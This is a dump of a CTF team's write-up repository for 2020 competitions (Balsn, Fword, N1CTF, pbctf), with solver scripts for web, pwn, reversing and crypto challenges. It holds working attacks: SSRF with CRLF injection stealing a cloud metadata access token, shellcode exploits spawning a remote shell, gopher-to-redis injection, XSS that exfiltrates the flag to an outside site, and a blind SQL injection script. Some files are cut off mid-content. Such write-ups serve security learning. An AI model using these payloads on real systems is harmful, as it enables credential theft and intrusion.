10 |
11 | sending `file:///etc/passwd` as a **site** argument gives us the content for `/etc/passwd`
12 |
13 | ```
14 | view-source:http://35.194.175.80:8000/query?site=file:///etc/passwd
15 | ```
16 |
17 | 
18 |
19 | So its **SSRF** ( Server-side request forgery ), if we send `file:///proc/self/cmdline` we get the command line which include python file name `main-dc1e2f5f7a4f359bb5ce1317a.py`
20 |
21 | ```
22 | /usr/local/bin/python/usr/local/bin/gunicorn main-dc1e2f5f7a4f359bb5ce1317a:app--bind0.0.0.0:8000--workers5--worker-tmp-dir/dev/shm--worker-classgevent--access-logfile---error-logfile-
23 | ```
24 |
25 | And finally read the source code http://35.194.175.80:8000/query?site=file:///opt/workdir/main-dc1e2f5f7a4f359bb5ce1317a.py`
26 |
27 | ```
28 | import urllib.request
29 |
30 | from flask import Flask, request
31 |
32 | app = Flask(__name__)
33 |
34 |
35 | @app.route("/query")
36 | def query():
37 | site = request.args.get('site')
38 | text = urllib.request.urlopen(site).read()
39 | return text
40 |
41 |
42 | @app.route("/")
43 | def hello_world():
44 | return "/query?site=[your website]"
45 |
46 |
47 | if __name__ == "__main__":
48 | app.run(debug=False, host="0.0.0.0", port=8000)
49 | ```
50 |
51 |
52 |
53 | Simple code, if we read more on `urllib` we can find it vulnerable to **CRLF** : https://bugs.python.org/issue35906 (CVE-2019-9947)
54 |
55 | And if we check `file:///etc/hosts` we find
56 |
57 | ```
58 | 169.254.169.254 metadata.google.internal metadata
59 | ```
60 |
61 | So we can read google cloud metadata using **SSRF** chained with **CRLF**
62 |
63 | ```
64 | curl -v 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Alol:%20'
65 | ```
66 |
67 | As output we have
68 |
69 | ```
70 | attributes/
71 | cpu-platform
72 | description
73 | disks/
74 | guest-attributes/
75 | hostname
76 | id
77 | image
78 | legacy-endpoint-access/
79 | licenses/
80 | machine-type
81 | maintenance-event
82 | name
83 | network-interfaces/
84 | preempted
85 | remaining-cpu-time
86 | scheduling/
87 | service-accounts/
88 | tags
89 | virtual-clock/
90 | zone
91 | ```
92 |
93 |
94 |
95 | We just next get access token , find out that we have access to storage **devstorage.read_only**
96 |
97 | ```
98 | {
99 | "issued_to": "102193360015934362205",
100 | "audience": "102193360015934362205",
101 | "scope": "https://www.googleapis.com/auth/trace.append https://www.googleapis.com/auth/monitoring.write https://www.googleapis.com/auth/service.management.readonly https://www.googleapis.com/auth/servicecontrol https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_only",
102 | "expires_in": 2844,
103 | "access_type": "online"
104 | }
105 | ```
106 |
107 | Reading **access_token**
108 |
109 | ```
110 | curl -s 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Alol:%20'
111 | ```
112 |
113 | And to read all `asia.artifacts.balsn-ctf-2020-tpc.appspot.com` bucket data
114 |
115 | We have full cmd to just process all this steps :
116 |
117 | ```
118 | mkdir out && access_token=$(curl -s 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Alol:%20' | jq -r '.access_token') && curl -s 'https://www.googleapis.com/storage/v1/b/asia.artifacts.balsn-ctf-2020-tpc.appspot.com/o?access_token='$access_token | jq -r '.items[].name' | while read obj;do curl -s -X GET -H 'Authorization: Bearer '$access_token https://storage.googleapis.com/asia.artifacts.balsn-ctf-2020-tpc.appspot.com/{$obj} --output out/output_$(echo $obj | cut -d ':' -f 2) ;done && cd out && for i in $(ls); do mkdir files;tar -xvf $i -C files/ ;done && grep -r "BALSN" files/opt
119 | ```
120 |
121 | And we just got the flag in the `/opt/workdir` directory
122 |
123 | ```
124 | BALSN{What_permissions_does_the_service_account_need}
125 | ```
126 |
--------------------------------------------------------------------------------
/2020/Balsn CTF 2020/web/The Woven/the_woven_web.py:
--------------------------------------------------------------------------------
1 | from flask import Flask
2 | app = Flask(__name__)
3 |
4 | @app.route('/index.html')
5 | def hello_world():
6 | r = """
7 |
8 |
9 |
22 |
24 |
27 |
28 |
29 | """
30 |
31 | return r,{"Content-Disposition":'attachment; filename="wtf22.html"'}
32 |
33 | if(__name__=="__main__"):
34 | app.run("0.0.0.0",4000)
35 |
36 | #How to solve:
37 | # 1. Host this somewhere
38 | # 2. Enter url of `index.html` to the bot, Then chrome will download file as wtf22.html and will save it in Downloads folder.
39 | # 3. Then send this url of saved file to bot: "file:///home/user/Downloads/wtf22.html"
40 | # 4. Flag will be sent to https://webhook.site/X
41 |
--------------------------------------------------------------------------------
/2020/Fword CTF 2020/README.md:
--------------------------------------------------------------------------------
1 | # FwordCTF 2020 (Online)
2 |
3 | * 29.08.2020 17:00 UTC ~ 30.08.2020 17:00 UTC
4 | [Official URL]: (https://ctf.fword.wtf/)
5 | [Event Organizers]: (https://ctftime.org/team/72251/)
6 | ---
7 | We finally ranked in #5
8 | * Rank : #5
9 | * CTF points : 16622.000
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/2020/Fword CTF 2020/pwn/One piece Remake/README.md:
--------------------------------------------------------------------------------
1 | # One Piece Remake
2 |
3 | ## Analysis
4 | The vulnerability looks pretty simple.
5 |
6 | ```c
7 | menu();
8 | while ( 1 )
9 | {
10 | while ( 1 )
11 | {
12 | printf("(menu)>>");
13 | fgets(&s, 15, stdin);
14 | if ( strcmp(&s, "read\n") )
15 | break;
16 | readSC();
17 | }
18 | if ( !strcmp(&s, "run\n") )
19 | {
20 | runSC();
21 | }
22 | else if ( !strcmp(&s, "gomugomunomi\n") )
23 | {
24 | mugiwara();
25 | }
26 | else
27 | {
28 | if ( !strcmp(&s, "exit\n") )
29 | exit(1);
30 | puts("can you even read ?!");
31 | }
32 | }
33 | ```
34 |
35 | We can input the shellcode to memory just use readSC() function.
36 | And execute the shellcode which wrote by us to memory just use runSC() function.
37 |
38 | However, the size of memory does not seem to be enough.
39 | So we need to think differently, there is format string bug in mugiwara() function, but we don't need to use this vulnerability.
40 |
41 | We can spray shellcodes through the mugiwara() function.
42 |
43 | ```c
44 | int mugiwara()
45 | {
46 | char buf; // [sp+Ch] [bp-6Ch]@1
47 |
48 | puts("what's your name pirate ?");
49 | printf(">>");
50 | read(0, &buf, 0x64u);
51 | printf(&buf);
52 | return 0;
53 | }
54 | ```
55 |
56 | Thus, we just spray shellcodes through the mugiwara() function, and just jump to this relative offsets.
57 | But, some memory pointers overwrite our intact shellcodes, so our shellcode will be corrupted by stack unwinding.
58 | We can use only 16 bytes for shellcoding, I just use instructions for storing values to specific memory and just increseaing our esp register, and retn.
59 |
60 | ```
61 | 0: 83 ec 60 sub esp,0x60
62 | 3: ff e4 jmp esp
63 | ```
64 |
65 | We can use this two instructions for execute our shellcodes which are smaller than 16 bytes.
66 | And finally we can write 4 bytes to specific addresses.
67 |
68 | ```
69 | 5: b8 11 22 33 44 mov eax,0x44332211
70 | a: c7 00 aa bb cc dd mov DWORD PTR [eax],0xddccbbaa
71 | 10: 83 c4 60 add esp,0x60
72 | 13: c3 ret
73 | ```
74 |
75 | And, there is no NX mitigations, we may execute the shellcodes on bss sections.
76 | Finally, i wrote all of my shellcodes to bss section, and finally jumped to my shellcode safely.
77 |
78 | ```python
79 | from pwn import *
80 |
81 | def pad_shellcode(shellcode):
82 | if len(shellcode) % 4 != 0:
83 | shellcode += ("\x90" * (4 - (len(shellcode) % 4)))
84 | return shellcode
85 |
86 | def write_4_bytes_to_address(address, codes):
87 | p.recvuntil("(menu)>>")
88 | p.sendline("read")
89 | p.recvuntil(">>")
90 | p.send("\x83\xec\x60\xff\xe4")
91 | p.recvuntil("(menu)>>")
92 | p.sendline("gomugomunomi")
93 | p.recvuntil(">>")
94 | payload = "\xb8" + p32(address)
95 | payload += "\xc7\x00" + codes
96 | payload += "\x83\xc4\x60"
97 | payload += "\xc3"
98 | p.send(payload)
99 | p.recvuntil("(menu)>>")
100 | p.sendline("run")
101 |
102 | def execute_shell():
103 | p.recvuntil("(menu)>>")
104 | p.sendline("read")
105 | p.recvuntil(">>")
106 | p.send("\x83\xec\x60\xff\xe4")
107 | p.recvuntil("(menu)>>")
108 | p.sendline("gomugomunomi")
109 | p.recvuntil(">>")
110 | payload = "\xb8\x48\xa0\x04\x08"
111 | payload += "\xff\xd0"
112 | p.send(payload)
113 | p.recvuntil("(menu)>>")
114 | p.sendline("run")
115 |
116 | sub_esp = "\x81\xec\x00\x02\x00\x00"
117 | shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\x31\xd2\xcd\x80"
118 | shellcode = pad_shellcode(shellcode)
119 |
120 | #p = process("./one_piece_remake")
121 | p = remote("onepiece.fword.wtf", 1236)
122 | for i in range(0, len(shellcode), 4):
123 | write_4_bytes_to_address(0x0804a048 + i, shellcode[i:i+4])
124 |
125 | execute_shell()
126 | p.interactive()
127 | ```
128 |
129 | Flag : FwordCTF{i_4m_G0inG_t0_B3coM3_th3_p1r4Te_K1NG}
--------------------------------------------------------------------------------
/2020/Fword CTF 2020/rev/Auto/README.md:
--------------------------------------------------------------------------------
1 | # Auto - 28 Solves
2 |
3 | ## Analysis
4 | This compressed 7z file consists of more than hundreds files, there are 400 binaries in file.
5 | Each file in 7z compressed file internal codes just like this.
6 |
7 | ```c
8 | v9 = 10 * (v5[v8 - 2] - 48) + v7;
9 | LODWORD(v10) = sub_10C0(v5);
10 | sub_10F0(v13, "./out%03d %s", (unsigned int)(v9 + v5[v10 - 1] - 48 + 1), v12 + 2);
11 | if ( (*v12 + 496 + v12[1]) >> 1 != 331 || *v12 + (char)(*v12 ^ v12[1]) != 92 || *v12 * v12[1] != 6880 )
12 | {
13 | sub_10B0("NOOOOOOOOOOOOOOOOOOOO");
14 | result = 0;
15 | }
16 | else
17 | {
18 | LODWORD(v11) = sub_10C0(v12);
19 | ```
20 |
21 | sub_10F0 is just for sprintf function, this code generates the name of next file of this current executed binary, and there are almost same codes in 400 binaries.
22 | Thus, if we can extract the calculated variables of each files, such as 406. 1. 331. 02. 6880 based on above code snippets.
23 | We can calculate the password key which used for executing next corrected binaries without angr framework.
24 |
25 | For solve these equations, i just use the SMT Solver library like 'z3'. I extracted values for these equations from all binaries.
26 |
27 | ```python
28 | import struct
29 | from z3 import *
30 |
31 | u32 = lambda x: struct.unpack("sdfsdfsf
";` 69 | 70 | This is our php serialized jutsu description after conversion to markdown. what we set here won't go though `htmlspecialchars` and markdown conversion xD. 71 | 72 | So to change jutsu's description to something like `itworked`, we should set `yLAP6wFwIy:jutsu5598` to php serialized format of `itworked` which is `s:8:"itworked";`. 73 | 74 | This url would do the job. 75 | 76 | `gopher://redis:6379/_SET%20yLAP6wFwIy%3Ajutsu5598%20%27s%3A8%3A%22itworked%22%3B%27` 77 | 78 | > We can wrap our set value in quotes or single quotes to avoid some parsing problems. 79 | 80 | ### part 3 - XSS in jutsu 81 | 82 | So we can inject description in our jutsu and bypass `htmlspecialchars`. The next step would be put xss payload in our jutsu's description and report it to admin and grab flag. 83 | 84 | We used following url to put payload in our jutsu. 85 | 86 | `gopher://redis:6379/_SET%20yLAP6wFwIy%3Ajutsu5598%20%27s%3A81%3A%22%3Cscript%20src%3D%22URL%22%3E%3C%2Fscript%3E%22%3B%27` 87 | 88 | And we put `document.location="https://yourwebsite/?a="+flag` in our embedded script. 89 | 90 | Reported our jutsu to admin, And we got the flag. 91 | 92 | >FLAG: FwordCTF{Y0u_Only_h4vE_T0_cH4in_4nd_Th1nk_w3ll} 93 | 94 | Thanks to my amazing teammates and ctf authors. 95 | -------------------------------------------------------------------------------- /2020/Fword CTF 2020/web/pastaxss/imgs/writeup1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Super-Guesser/ctf/21ad5acdc39be59af80cc43412912ec662d0e695/2020/Fword CTF 2020/web/pastaxss/imgs/writeup1.png -------------------------------------------------------------------------------- /2020/Fword CTF 2020/web/pastaxss/imgs/writeup2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Super-Guesser/ctf/21ad5acdc39be59af80cc43412912ec662d0e695/2020/Fword CTF 2020/web/pastaxss/imgs/writeup2.png -------------------------------------------------------------------------------- /2020/Fword CTF 2020/web/pastaxss/imgs/writeup3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Super-Guesser/ctf/21ad5acdc39be59af80cc43412912ec662d0e695/2020/Fword CTF 2020/web/pastaxss/imgs/writeup3.png -------------------------------------------------------------------------------- /2020/N1CTF 2020/crypto/BabyProof/README.md: -------------------------------------------------------------------------------- 1 | ## BabyProof 2 | 3 | ```python 4 | from hashlib import sha256 5 | 6 | from Crypto.Util.number import getRandomRange 7 | from Crypto.PublicKey import DSA 8 | 9 | from secret import proof_of_work, flag 10 | 11 | 12 | x = int.from_bytes(flag, 'big') 13 | assert x.bit_length() == 247 14 | 15 | 16 | def baby_proof(): 17 | key = DSA.generate(3072) # It takes time to generate, plz be patient... 18 | p, q, g = key.domain() 19 | y = pow(g, x, p) 20 | 21 | v = getRandomRange(1, x) 22 | t = pow(g, v, p) 23 | 24 | gyt = b"".join( 25 | map( 26 | lambda x: int.to_bytes(len(str(x)), 4, 'big') + str(x).encode(), 27 | (g, y, t) 28 | )) 29 | c = int.from_bytes(sha256(gyt).digest(), 'big') 30 | r = (v - c*x) % q 31 | 32 | print("I want to prove to you that I am in the knowledge of the discrete " 33 | "logarithm x that satisfies g^x = y modulo p, with the order of g " 34 | "modulo p being q.") 35 | print("However, I don't want to leak any information about x.") 36 | print("So, I use a non-interactive zero-knowledge proof for my purpose.") 37 | print("=================================================================") 38 | print("Here is my proof: ") 39 | print("Firstly, I choose a random (secret) v and compute t = g^v in Zq.") 40 | print("Secondly, I compute c = SHA256(g, y, t).") 41 | print("Then, I compute r = v - cx modulo q.") 42 | print("Finally, I will send you my proof (t, r).") 43 | print("You can check it by determining whether t == g^r * y^c or not.") 44 | print("Since there's negligible probability that I could forge the value " 45 | "r, you should believe that I really have knowledge of x.") 46 | print(g, y, p, q, t, r, sep="\n") 47 | 48 | 49 | if __name__ == "__main__": 50 | if proof_of_work(): 51 | baby_proof() 52 | ``` 53 | 54 | The key here is that xx is quite small compared to 22562256, and vv is selected in [1,x][1,x]. 55 | 56 | Given the printed parameters, we can directly obtain the value of cc as well. We see that 57 | 58 |  59 | 60 | Since xx's bit length is 247247, we get 1≤v≤22471≤v≤2247 and can write something like 61 | 62 |  63 | 64 | This is an instance of Hidden Number Problem, so just gather a lot of these information and solve it. 65 | 66 | ```python 67 | d = 60 ## get 60 instances 68 | M = Matrix(ZZ, d+1, d+1) 69 | for i in range(0, d): 70 | M[0, i] = cs[i] 71 | M[0, d] = 1 72 | for i in range(0, d): 73 | M[i+1, i] = qs[i] 74 | 75 | Target = [0] * (d+1) 76 | for i in range(0, d): 77 | Target[i] = (2 ** 246) - rs[i] 78 | Target[d] = (2 ** 246) 79 | 80 | M = M.LLL() 81 | GG = M.gram_schmidt()[0] 82 | Target = vector(Target) 83 | TT = Babai_closest_vector(M, GG, Target) 84 | 85 | x = TT[d] 86 | print(x) 87 | print(bytes.fromhex(hex(x)[2:])) 88 | ``` 89 | 90 | -------------------------------------------------------------------------------- /2020/N1CTF 2020/crypto/BabyProof/e1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Super-Guesser/ctf/21ad5acdc39be59af80cc43412912ec662d0e695/2020/N1CTF 2020/crypto/BabyProof/e1.PNG -------------------------------------------------------------------------------- /2020/N1CTF 2020/crypto/BabyProof/e2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Super-Guesser/ctf/21ad5acdc39be59af80cc43412912ec662d0e695/2020/N1CTF 2020/crypto/BabyProof/e2.PNG -------------------------------------------------------------------------------- /2020/N1CTF 2020/crypto/FlagBot/README.md: -------------------------------------------------------------------------------- 1 | ## FlagBot 2 | 3 | ```python 4 | from hashlib import sha256 5 | from Crypto.Cipher import AES 6 | from Crypto.Util.number import long_to_bytes, bytes_to_long 7 | from Crypto.Util.Padding import pad, unpad 8 | import base64 9 | from secret import flag 10 | 11 | RECEIVER_NUM = 7 12 | 13 | def generate_safecurve(): 14 | while True: 15 | p = random_prime(2 ^ 256-1, False, 2 ^ 255) 16 | a = randint(-p, p) 17 | b = randint(-p, p) 18 | 19 | if 4*a^3 + 27*b^2 == 0: 20 | continue 21 | 22 | E = EllipticCurve(GF(p), [a, b]) 23 | 24 | fac = list(factor(E.order())) 25 | 26 | # Prevent rho method 27 | if fac[-1][0] < 1 << 80: 28 | continue 29 | 30 | # Prevent transfer 31 | for k in range(1, 20): 32 | if (p ^ k - 1) % fac[-1][0] == 0: 33 | break 34 | else: 35 | return E 36 | 37 | class Sender: 38 | def __init__(self, curves, receivers): 39 | self.secret = randint(1 << 254, 1 << 255) 40 | self.curves = curves 41 | self.receivers = receivers 42 | self.shared_secrets = [None for _ in range(len(receivers))] 43 | 44 | def setup_connections(self): 45 | for idx, receiver in enumerate(self.receivers): 46 | curve = self.curves[idx] 47 | print(f"curves[{idx}] : {curve}") 48 | g = self.curves[idx].gens()[0] 49 | print(f"g[{idx}] = {g.xy()}") 50 | receiver.set_curve(curve, g) 51 | public = self.secret * g 52 | print(f"S_pub[{idx}] = {public.xy()}") 53 | yours = receiver.key_exchange(public) 54 | print(f"R_pub[{idx}] = {yours.xy()}") 55 | self.shared_secrets[idx] = yours * self.secret 56 | 57 | def send_secret(self): 58 | msg = b'Hi, here is your flag: ' + flag 59 | for idx, receiver in enumerate(self.receivers): 60 | px = self.shared_secrets[idx].xy()[0] 61 | _hash = sha256(long_to_bytes(px)).digest() 62 | key = _hash[:16] 63 | iv = _hash[16:] 64 | encrypted_msg = base64.b64encode(AES.new(key, AES.MODE_CBC, iv).encrypt(pad(msg, 16))) 65 | print(f"encrypted_msg[{idx}] = {encrypted_msg}") 66 | receiver.receive(encrypted_msg) 67 | 68 | 69 | class Receiver: 70 | def __init__(self): 71 | self.secret = randint(1 << 254, 1 << 255) 72 | self.curve = None 73 | self.g = None 74 | self.shared_secret = None 75 | 76 | def set_curve(self, curve, g): 77 | self.curve = curve 78 | self.g = g 79 | 80 | def key_exchange(self, yours): 81 | self.shared_secret = yours * self.secret 82 | return self.g * self.secret 83 | 84 | def receive(self, encrypted_msg): 85 | px = self.shared_secret.xy()[0] 86 | _hash = sha256(long_to_bytes(px)).digest() 87 | key = _hash[:16] 88 | iv = _hash[16:] 89 | msg = AES.new(key, AES.MODE_CBC, iv).decrypt(base64.b64decode(encrypted_msg)) 90 | msg = unpad(msg, 16) 91 | assert msg.startswith(b'Hi, here is your flag: ') 92 | 93 | 94 | receivers = [Receiver() for _ in range(RECEIVER_NUM)] 95 | curves = [generate_safecurve() for _ in range(RECEIVER_NUM)] 96 | 97 | A = Sender(curves, receivers) 98 | A.setup_connections() 99 | A.send_secret() 100 | ``` 101 | 102 | This problem was solved by me, so I can give you a brief look inside my brain. 103 | 104 | - You can't really do anything with AES-CBC in this challenge 105 | - You can't really do anything with SHA256 anywhere 106 | - That means that we have to break the DH style shared secret generation 107 | - The secret key is reused every time, so that's the vulnerability 108 | - The curve generation only checks the existence of large primes, so small primes can exist 109 | 110 | At this point, the solution was straightforward. For each small prime pp that divides the order of the elliptic curve used, we can find the value of the secret key (modp)(modp) by using Pohlig-Hellman approach. Combining these with CRT, we can recover dd since it is at most 22552255. 111 | 112 | Since we do need to deal with primes of size around 10121012, Baby-Step-Giant-Step is required. Just use Sage. 113 | 114 | 115 | 116 | The below code finds all the shared secrets. The remaining parts of the problem are straightforward. 117 | 118 | ```python 119 | cur_mod = 1 120 | cur_val = 0 121 | 122 | for i in range(0, 7): 123 | a = S[i][0] 124 | b = S[i][1] 125 | p = S[i][2] 126 | E = EllipticCurve(GF(p), [a, b]) 127 | Ord = E.order() 128 | L = list(factor(Ord)) 129 | GG = E(g[i]) 130 | SS = E(S_pub[i]) 131 | for pp, dd in L: 132 | if pp <= 10 ** 12 and dd == 1: 133 | Gp = (Ord // pp) * GG 134 | Sp = (Ord // pp) * SS 135 | tt = discrete_log(Sp, Gp, operation='+') 136 | cur_val = crt(cur_val, tt, cur_mod, pp) 137 | cur_mod = (cur_mod * pp) // gcd(pp, cur_mod) 138 | print("Done ", i) 139 | 140 | print("[+] Secret: ", cur_val) 141 | 142 | for i in range(0, 7): 143 | a = S[i][0] 144 | b = S[i][1] 145 | p = S[i][2] 146 | E = EllipticCurve(GF(p), [a, b]) 147 | RR = E(R_pub[i]) 148 | RES = RR * cur_val 149 | print(RES.xy()[0]) 150 | ``` 151 | 152 | -------------------------------------------------------------------------------- /2020/N1CTF 2020/crypto/N1Vault/README.md: -------------------------------------------------------------------------------- 1 | ## n1vault 2 | 3 | There was a secret logic that triggered when SIGFPE is sent to the program. The main goal of the challenge is to trigger this secret logic. 4 | 5 | There's only one point that SIGFPE signal can be triggered, with divide-by-zero exception. 6 | 7 | ``` c 8 | if ( !memcmp(&s1, &s2, 0x20uLL) 9 | && !memcmp(&v14, &v50, 0x20uLL) 10 | && 0x422048F8DF49762ELL / (v5 | v4) == 1 11 | && v4 == 0x9E48562A 12 | && v5 == 0x422048F8DF41242ELL ) 13 | ``` 14 | 15 | If both `v5` and `v4` is zero, then it will be triggered. 16 | 17 | After reversing binary, it was able to know that: 18 | 19 | 1. Every part of the input data is digested in to SHA256 and compared with the fixed value (`memcmp` above), except `data[0x10B0::2]`. 20 | This means we cannot change except `data[0x10B0::2]` to pass the SHA256 checking logic. 21 | 2. `v5` is the CRC64 value of the data and `v4` is the CRC32 value of the data. 22 | 23 | So this challenge is about changing `data[0x10B0::2]` (total 12 bytes) to make both CRC32 and CRC64 to zero. 24 | 25 | Usually, CRC has an interesting property, that $CRC(x \oplus y) = CRC(x) \oplus CRC(y)$. In this challenge, the starting value of CRCk is `(1 << k) - 1`, so this is a bit different: $CRC(x \oplus y) = CRC(x) \oplus CRC(y) \oplus CRC(0)$. 26 | 27 | From this, for each unknown bit $x_0, x_1, ..., x_{95}$, this challenge asks: $CRC(x_0 \oplus x_1 \oplus \ldots \oplus x_{95}) = 0$. By using the property above, we can make this into $CRC(x_0) \oplus CRC(x_1) \oplus \ldots \oplus CRC(x_{95}) \oplus CRC(0) = 0$. 28 | 29 | For $k$-th bit of CRC, we can think like: $CRC(x_0)_k \oplus CRC(x_1)_k \oplus \ldots \oplus CRC(x_{95})_k \oplus CRC(0)_k = 0$. Moreover, we can think like this way: $CRC(x_0 | x_0=1)_k \cdot x_0 \oplus CRC(x_1 | x_1=1)_k \cdot x_1 \oplus \ldots \oplus CRC(x_{95} | x_{95} = 1)_k \cdot x_{95} \oplus CRC(0)_k = 0$. We know that XOR operator is same as addition on mod 2. Therefore, this is a linear equation over mod 2 on $x_0$ to $x_{95}$. 30 | 31 | For each bit of CRC64, we can get 64 linear equations over mod 2 on $x_0$ to $x_{95}$. For each bit of CRC32, we can get 32 linear equations over mod 2 on $x_0$ to $x_{95}$. These are total 96 equations, and unknown bits are total 96 bits. We can solve this by gauss elimination. 32 | 33 | The solver code is here: 34 | 35 | ```python 36 | #!/usr/bin/env sage 37 | 38 | import struct 39 | 40 | with open('credential.png', 'rb') as f: 41 | data = f.read(0x10C8) 42 | 43 | crc32_table = [] 44 | crc64_table = [] 45 | with open('n1vault', 'rb') as f: 46 | f.seek(0x1960) 47 | for i in range(256): 48 | crc32_table.append(struct.unpack('
');
24 | }
25 | else
26 | {
27 | // prevent sql injection
28 | $id = mysqli_real_escape_string($conn, $_GET["id"]);
29 |
30 | $query = "select * from flag_here_hihi where id=".$id;
31 | $run_query = mysqli_query($conn,$query);
32 |
33 | if(!$run_query) {
34 | echo mysqli_error($conn);
35 | }
36 | else
37 | {
38 | // I'm kidding, just the name of flag, not flag :(
39 | echo ''; 40 | $res = $run_query->fetch_array()[1]; 41 | echo $res; 42 | } 43 | } 44 | } 45 | 46 | ?> 47 | ``` 48 | 49 | The code is filtering `sys` and `column`. So, I thought it's hard to get column name directly and also `union` is filtered. So, we cannot use redefining column name using `union` is also unavailable. But there is a part which prints error. 50 | 51 | ```php 52 | if(!$run_query) { 53 | echo mysqli_error($conn); 54 | } 55 | ``` 56 | 57 | 58 | 59 | So, I guess we can trigger errors for getting column name. 60 | 61 | While I was digging some method, I realized that server's configuration is not normal case. 62 | 63 | Below payload caused an error. 64 | 65 | ```sql 66 | -9 group by 1 67 | ``` 68 | 69 | error: 70 | 71 | ``` 72 | Expression #2 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'flag_here_hoho.flag_here_hihi.t_fl4g_name_su' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by 73 | ``` 74 | 75 | this error is displaying `dbname.table_name.column_name` 76 | 77 | So, we can get the column name of flag with `group by 2` 78 | 79 | 80 | 81 | ``` 82 | Expression #3 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'flag_here_hoho.flag_here_hihi.t_fl4g_v3lue_su' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by 83 | ``` 84 | 85 | So, column name was `t_fl4g_v3lue_su`. 86 | 87 | And there is no filtering with `right`, `left`, `ascii` and `in`. These will cause blind sql injection. 88 | 89 | So, my final payload is like this 90 | 91 | 92 | 93 | ```python 94 | import requests 95 | 96 | flag = '' 97 | for i in range(1,100): 98 | for j in range(32,127): 99 | conn = requests.get('http://45.77.255.164/?id=-9||ascii(right(left(t_fl4g_v3lue_su,'+str(i)+'),1))in('+str(j)+')') 100 | r1 = conn.content 101 | #print j 102 | if 'handsome_flag' in r1: 103 | flag += chr(j) 104 | print flag 105 | break 106 | ``` -------------------------------------------------------------------------------- /2020/pbctf 2020/README.md: -------------------------------------------------------------------------------- 1 | ## pbCTF 2020 Write ups 2 | 3 | ### pwn 4 | - Jheap - [pwn/jheap](pwn/jheap) 5 | - Pwnception - [pwn/pwnception](pwn/pwnception) 6 | - Amazing ROP - [pwn/Amazing-ROP](pwn/Amazing-ROP) 7 | 8 | ### rev 9 | - RGNN - [rev/rgnn](rev/rgnn) 10 | 11 | ### misc 12 | - Vaccine Stealer - [misc/vaccine_stealer](misc/vaccine_stealer) 13 | - Not Stego - [misc/not_stego](misc/not_stego) 14 | - Find rbtree - https://rkm0959.tistory.com/174 15 | - Gcombo - [misc/gcombo](misc/gcombo) 16 | 17 | ### web 18 | - Ikea Name Generator - [web/ikea-name-generator](web/ikea-name-generator) 19 | - XSP - [web/XSP](web/XSP) 20 | - Apoche I - [web/apoche1](web/apoche1) 21 | - Simple Note - [web/simple_note](web/simple_note) 22 | - Sploosh - [web/sploosh](web/sploosh) 23 | 24 | ### crypto 25 | - Strong Cipher - [crypto/strong_cipher](crypto/strong_cipher) 26 | - Ainissesthai - [crypto/ainissesthai](crypto/ainissesthai) 27 | - QueenSarah2, LeaK, Special Gift, Special Gift Revenge - https://rkm0959.tistory.com/174 28 | -------------------------------------------------------------------------------- /2020/pbctf 2020/crypto/ainissesthai/README.md: -------------------------------------------------------------------------------- 1 | # Challenge 2 | 3 | * **Points**: 53 4 | * **Solves**: 59 5 | * **Files**: [ainissesthai.py](./ainissesthai.py) 6 | 7 | ``` 8 | A team of codebreakers had to invent computers to break this cipher. Can you figure out what the flag is? 9 | Remote: nc ainissesthai.chal.perfect.blue 1 10 | Note: enter flag as pbctf{UPPERCASEPLAINTEXT} 11 | By: UnblvR 12 | ``` 13 | 14 | # Solution 15 | The server is encrypting the flag 50 times with different values using Enigma, which has a property that no letter ever encrypts to itself. We can recover the flag by getting many ciphertexts and eliminate characters until we're left with one. 16 | 17 | ```python 18 | from pwn import * 19 | from string import ascii_uppercase 20 | 21 | flag = [set(ascii_uppercase.encode()) for _ in range(17)] 22 | while any(len(c) != 1 for c in flag): 23 | r = remote('ainissesthai.chal.perfect.blue', 1) 24 | cts = r.recvall().split() 25 | for ct in cts: 26 | for i, c in enumerate(ct): 27 | if c in flag[i]: 28 | flag[i].remove(c) 29 | 30 | flag = bytes(int(c.pop()) for c in flag).decode() 31 | print(f'pbctf{{{flag}}}') 32 | ``` 33 | 34 | # FLAG 35 | `pbctf{FATALFLAWINENIGMA}` 36 | -------------------------------------------------------------------------------- /2020/pbctf 2020/crypto/ainissesthai/ainissesthai.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python3 2 | 3 | from string import ascii_uppercase as UC 4 | from random import SystemRandom 5 | from enigma.machine import EnigmaMachine 6 | from secretstuff import FLAG, PLUGBOARD_SETTINGS 7 | 8 | assert FLAG.isupper() # Without pbcft{...} 9 | random = SystemRandom() 10 | 11 | for _ in range(50): 12 | ROTORS = [random.choice(("I","II","III","IV","V","VI","VII","VIII")) for _ in range(3)] 13 | REFLECTOR = random.choice(("B", "C", "B-Thin", "C-Thin")) 14 | RING_SETTINGS = [random.randrange(26) for _ in range(3)] 15 | 16 | machine = EnigmaMachine.from_key_sheet( 17 | rotors=ROTORS, 18 | reflector=REFLECTOR, 19 | ring_settings=RING_SETTINGS, 20 | plugboard_settings=PLUGBOARD_SETTINGS) 21 | 22 | machine.set_display(''.join(random.sample(UC, 3))) 23 | 24 | ciphertext = machine.process_text(FLAG) 25 | 26 | print(ciphertext) -------------------------------------------------------------------------------- /2020/pbctf 2020/crypto/strong_cipher/ciphertext: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Super-Guesser/ctf/21ad5acdc39be59af80cc43412912ec662d0e695/2020/pbctf 2020/crypto/strong_cipher/ciphertext -------------------------------------------------------------------------------- /2020/pbctf 